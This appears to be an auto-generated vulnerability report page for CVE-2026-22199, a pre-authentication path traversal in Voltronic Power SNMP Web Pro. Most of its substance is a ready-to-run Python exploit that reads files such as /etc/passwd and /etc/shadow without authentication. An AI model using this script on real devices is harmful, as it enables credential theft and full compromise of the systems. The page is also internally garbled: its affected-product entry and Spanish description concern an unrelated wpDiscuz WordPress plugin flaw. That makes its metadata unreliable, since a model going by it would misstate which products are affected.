Security Vulnerability Report
中文
CVE-2026-22199 CVSS 7.5 HIGH

CVE-2026-22199

Published: 2026-03-13 19:54:10
Last Modified: 2026-04-23 13:16:11
Source: [email protected]

Description

Voltronic Power SNMP Web Pro version 1.1 contains a pre-authentication path traversal vulnerability in the upload.cgi endpoint that allows unauthenticated attackers to read arbitrary files on the device filesystem by supplying directory traversal sequences in the params parameter. Attackers can exploit this vulnerability to disclose sensitive files such as password hashes, which can be cracked offline to obtain root-level access and enable full system compromise.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* - VULNERABLE
Voltronic Power SNMP Web Pro <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22199 PoC - Voltronic Power SNMP Web Pro Path Traversal # Target: /cgi-bin/upload.cgi?params=../../../../etc/passwd def exploit_cve_2026_22199(target_url, filename='/etc/passwd'): """ Exploit for pre-auth path traversal in upload.cgi Args: target_url: Base URL of the vulnerable target filename: Path to file to read (default: /etc/passwd) Returns: Content of the requested file """ # Construct traversal path traversal = '../' * 6 target_path = traversal + filename.lstrip('/') # Build exploit URL exploit_url = f"{target_url.rstrip('/')}/cgi-bin/upload.cgi" params = {'params': target_path} print(f"[*] Target: {exploit_url}") print(f"[*] Attempting to read: {filename}") print(f"[*] Path traversal: {target_path}") try: # Send request without authentication response = requests.get(exploit_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Success! File content:") print(response.text) return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def read_sensitive_files(target_url): """ Attempt to read multiple sensitive files """ sensitive_files = [ '/etc/passwd', '/etc/shadow', '/etc/hosts', '/var/log/messages', '/root/.bash_history' ] for file in sensitive_files: print(f"\n[*] Trying: {file}") result = exploit_cve_2026_22199(target_url, file) if result: break if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [filename]") print(f"Example: python {sys.argv[0]} http://target.com /etc/passwd") sys.exit(1) target = sys.argv[1] filename = sys.argv[2] if len(sys.argv) > 2 else '/etc/passwd' if len(sys.argv) > 2: exploit_cve_2026_22199(target, filename) else: read_sensitive_files(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22199", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:09.933", "lastModified": "2026-04-23T13:16:11.417", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Voltronic Power SNMP Web Pro version 1.1 contains a pre-authentication path traversal vulnerability in the upload.cgi endpoint that allows unauthenticated attackers to read arbitrary files on the device filesystem by supplying directory traversal sequences in the params parameter. Attackers can exploit this vulnerability to disclose sensitive files such as password hashes, which can be cracked offline to obtain root-level access and enable full system compromise."}, {"lang": "es", "value": "wpDiscuz antes de 7.6.47 contiene una vulnerabilidad de manipulación de votos que permite a los atacantes manipular los votos de los comentarios al obtener nonces frescos y eludir la limitación de velocidad a través de encabezados controlados por el cliente. Los atacantes pueden variar los encabezados User-Agent para restablecer los límites de velocidad, solicitar nonces desde el endpoint wpdGetNonce no autenticado y votar varias veces utilizando rotación de IP o manipulación de encabezados de proxy inverso."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt", "source": "[email protected]"}, {"url": "https://voltronicpower.com/", "source": "[email protected]"}, {"url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/voltronic-power-snmp-web-pro-path-traversal-via-upload-cgi", "source": "[email protected]"}, {"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.